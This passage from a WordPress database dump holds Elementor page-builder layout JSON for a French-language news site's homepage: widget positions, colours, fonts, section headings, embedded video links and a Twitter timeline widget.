":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":10,\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"17\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"offset\":\"0\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"3k7dn06\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"6\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":35},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"140\",\"category_bg_color\":\"#e2db00\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":10,\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"17\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"offset\":\"0\",\"title_font_size\":{\"unit\":\"px\",\"size\":16},\"use_date\":\"\",\"use_read\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"48mal4x\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.960\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"x20xpc5\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#ff6600\",\"category_bg_hover_color\":\"#ea7441\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"y4m8rgg\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"4\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#0099f4\",\"category_bg_hover_color\":\"#e5e100\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_color1\":\"rgba(255,255,255,0.5)\",\"post_icon_color2\":\"rgba(255,255,255,0.5)\",\"post_icon_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"offset\":\"1\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c10cdqk\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"cnfm4uk\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ofz40wf\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":17}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ghxiaw4\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"p0xcklh\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"tdxggq6\",\"elType\":\"widget\",\"settings\":{\"title\":\"R\\u00e9cent\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"lf137zu\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"6\",\"category_border_color\":\"#31c6b0\",\"title_font_size\":{\"unit\":\"px\",\"size\":12},\"use_excerpt\":\"\",\"button_bg_color\":\"#31c6b0\",\"animetime\":0},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false},{\"id\":\"h33oed1\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"z1s2m91\",\"elType\":\"widget\",\"settings\":{\"title\":\"Videos \",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"tb167uj\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=0jeXbexRihs\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"},{\"id\":\"4pok7wn\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=c_ixEg9Gszk&feature=youtu.be\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"},{\"id\":\"m45qqz3\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=wQaejvxoQ2o\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"dzzumio\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"q3q9ybg\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"tbcuyne\",\"elType\":\"widget\",\"settings\":{\"title\":\"Technologie\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8sxkg8r\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"yxax9tw\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":57.998},\"elements\":[{\"id\":\"cetl99v\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"6\",\"category\":[\"3\"],\"title_font_size\":{\"unit\":\"px\",\"size\":12},\"use_date\":\"\",\"use_excerpt\":\"\",\"animate\":\"\",\"animetime\":0,\"category_border_color\":\"#4a00b4\",\"button_bg_color\":\"#4a00b4\"},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false},{\"id\":\"583gbbd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":42.001},\"elements\":[{\"id\":\"ed1i4kp\",\"elType\":\"widget\",\"settings\":{\"wp\":{\"title\":\"Suivez nous sur Twitter\",\"twitter_timeline_type\":\"username\",\"twitter_widget_username\":\"Gn_innovations\",\"twitter_widget_id\":\"\",\"twitter_widget_width\":\"\",\"twitter_widget_height\":\"400\",\"twitter_widget_tweet_limit\":\"4\",\"twitter_widget_theme\":\"light\",\"twitter_widget_link_color\":\"#3b94d9\",\"twitter_widget_border_color\":\"#f5f5f5\"}},\"elements\":[],\"widgetType\":\"wp-widget-do-etfw\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0h88cw7\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0d8cxde\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"gw32h4p\",\"elType\":\"widget\",\"settings\":{\"title\":\"Agriculture\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8hg86ic\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"i9kn0sp\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"fxvmt3h\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"3\",\"category\":[\"2\"],\"excerpt_value\":10},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bguffns\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"15hcw7d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ptqj2h6\",\"elType\":\"widget\",\"settings\":{\"title\":\"Autres\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ub0yntr\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"tkvnvir\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(2414,772,'_elementor_version','0.4'),(2415,772,'_elementor_css','a:3:{s:4:\"time\";i:1509378851;s:5:\"fonts\";a:1:{i:0;s:5:\"Arial\";}s:6:\"status\";s:4:\"file\";}'),(2417,773,'_elementor_edit_mode','builder'),(2418,773,'_elementor_data','[{\"id\":\"cgfdli8\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":1170},\"gap\":\"no\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"90zub0t\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"9wd6jr7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"30\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"so55224\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.961\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"gvq9sbs\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"2\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#4caf50\",\"category_bg_hover_color\":\"#4caf50\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"offset\":\"0\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"dghaq27\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"offset\":\"0\",\"category\":[\"17\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"56\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#fd0249\",\"category_bg_hover_color\":\"#266cc9\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"title_font_size\":{\"unit\":\"px\",\"size\":20}},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"6uc2i0p\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"44.078\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"fb4g874\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":52},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"350\",\"category_bg_color\":\"#4a00b4\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":10,\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"17\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"offset\":\"0\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"3k7dn06\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"6\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":35},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"140\",\"category_bg_color\":\"#e2db00\",\"category_bg_hover_color\":\"#c9975